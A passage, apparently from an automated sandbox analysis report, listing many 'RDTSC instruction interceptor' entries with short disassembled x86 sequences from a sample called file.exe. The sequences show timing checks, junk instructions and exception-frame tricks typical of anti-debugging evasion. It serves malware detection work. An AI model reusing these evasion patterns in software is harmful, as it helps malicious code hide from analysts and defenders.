0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D3E7 second address: 63D3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FFC2 second address: 63FFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB418E85316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FFCC second address: 63FFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FFD0 second address: 63FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB418E8531Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FFEB second address: 63FFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6401A4 second address: 6401AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6401AA second address: 640240 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418C0B128h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, 573E042Ah 0x00000013 push dword ptr fs:[00000000h] 0x0000001a sub edi, 0E01FEAAh 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov ebx, dword ptr [ebp+122D35BFh] 0x0000002d mov eax, dword ptr [ebp+122D13C5h] 0x00000033 push FFFFFFFFh 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FB418C0B128h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov di, dx 0x00000052 nop 0x00000053 ja 00007FB418C0B13Ch 0x00000059 push eax 0x0000005a pushad 0x0000005b jno 00007FB418C0B139h 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6421A8 second address: 6421AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640240 second address: 640246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643215 second address: 643219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643219 second address: 64321F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64321F second address: 643225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 645377 second address: 645388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB418C0B128h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64230A second address: 642310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6444DC second address: 6444E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 645388 second address: 64538E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6444E0 second address: 6444FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB418C0B135h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642310 second address: 642395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FB418E85321h 0x00000014 popad 0x00000015 pop ecx 0x00000016 nop 0x00000017 movzx ebx, si 0x0000001a push dword ptr fs:[00000000h] 0x00000021 sbb di, 16B3h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FB418E85318h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D0F49h] 0x0000004d jns 00007FB418E85323h 0x00000053 adc bx, AFF0h 0x00000058 push FFFFFFFFh 0x0000005a or edi, 652BFF1Ah 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6444FD second address: 64457A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B130h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sbb edi, 4DDCCCBDh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+122D24B1h], ecx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 add dword ptr [ebp+12465E48h], edx 0x0000002b mov eax, dword ptr [ebp+122D0021h] 0x00000031 movsx edi, dx 0x00000034 push esi 0x00000035 mov ebx, ecx 0x00000037 pop edi 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007FB418C0B128h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 movzx ebx, cx 0x00000057 mov edi, dword ptr [ebp+12465DE0h] 0x0000005d mov di, dx 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 jne 00007FB418C0B128h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642395 second address: 642399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6455E2 second address: 6455E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64457A second address: 644590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E85322h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64651D second address: 646535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FB418C0B126h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FB418C0B126h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642399 second address: 64239D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647269 second address: 64726F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644590 second address: 6445A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64239D second address: 6423B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB418C0B132h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64726F second address: 647273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6445A2 second address: 6445A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423B8 second address: 6423C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6445A6 second address: 6445AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6423C6 second address: 6423CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647273 second address: 647307 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FB418C0B128h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub edi, dword ptr [ebp+1247C1C1h] 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+122D3896h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FB418C0B128h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1DFDh], edi 0x00000059 pushad 0x0000005a jnc 00007FB418C0B12Ch 0x00000060 mov dword ptr [ebp+122D251Dh], edx 0x00000066 popad 0x00000067 xchg eax, esi 0x00000068 js 00007FB418C0B12Eh 0x0000006e push ecx 0x0000006f jg 00007FB418C0B126h 0x00000075 pop ecx 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FB418C0B12Fh 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647307 second address: 647311 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6474B8 second address: 64753E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007FB418C0B126h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FB418C0B128h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 add dword ptr [ebp+122D2E6Fh], ecx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FB418C0B128h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D2439h] 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d mov eax, dword ptr [ebp+122D1085h] 0x00000063 mov di, 55ADh 0x00000067 push FFFFFFFFh 0x00000069 jmp 00007FB418C0B12Ch 0x0000006e nop 0x0000006f push edi 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64753E second address: 647542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6484CE second address: 6484D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6484D2 second address: 6484FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB418E8531Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FB418E85318h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6484FC second address: 648502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648502 second address: 648506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AEB1 second address: 64AEB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2715 second address: 5F2727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007FB418E85316h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F2727 second address: 5F272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6502A4 second address: 6502AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB418E85316h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6502AF second address: 6502B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6502B5 second address: 6502BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6502BE second address: 6502C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6502C2 second address: 6502CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB418E85316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6503F9 second address: 6503FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6503FF second address: 650418 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FB418E8531Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65631D second address: 656321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656321 second address: 656334 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CF49 second address: 65CF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C48B second address: 65C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C6F5 second address: 65C733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB418C0B136h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418C0B137h 0x00000011 jmp 00007FB418C0B12Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C733 second address: 65C73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C864 second address: 65C881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB418C0B12Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FB418C0B126h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C881 second address: 65C88B instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C88B second address: 65C891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC4B second address: 65CC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007FB418E85316h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007FB418E8531Eh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CDEE second address: 65CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CDF4 second address: 65CE04 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB418E85316h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE04 second address: 65CE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7637 second address: 5F763B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F763B second address: 5F7646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7646 second address: 5F7668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007FB418E8531Eh 0x0000000b jnp 00007FB418E85316h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push ebx 0x00000016 jmp 00007FB418E8531Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6677F6 second address: 66780E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB418C0B126h 0x00000009 je 00007FB418C0B126h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66780E second address: 66784D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85323h 0x00000009 popad 0x0000000a jmp 00007FB418E8531Ch 0x0000000f pushad 0x00000010 jc 00007FB418E85316h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jo 00007FB418E85316h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jnl 00007FB418E85316h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E857B second address: 5E8591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB418C0B131h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8591 second address: 5E859D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418E8531Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E859D second address: 5E85A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E85A5 second address: 5E85AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666D0 second address: 6666DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418C0B126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666DA second address: 6666EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB418E8531Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666EB second address: 6666F9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418C0B128h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6666F9 second address: 6666FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630335 second address: 63034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418C0B135h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6303B7 second address: 6303F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FB418E85326h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e jbe 00007FB418E8532Fh 0x00000014 pushad 0x00000015 jmp 00007FB418E85321h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630DBB second address: 630DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB418C0B130h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6156DA second address: 6156E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6156E0 second address: 6156E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666AEC second address: 666AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666AF0 second address: 666AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66714D second address: 667153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667153 second address: 667157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667157 second address: 66716C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB418E8531Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DBA7 second address: 66DBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
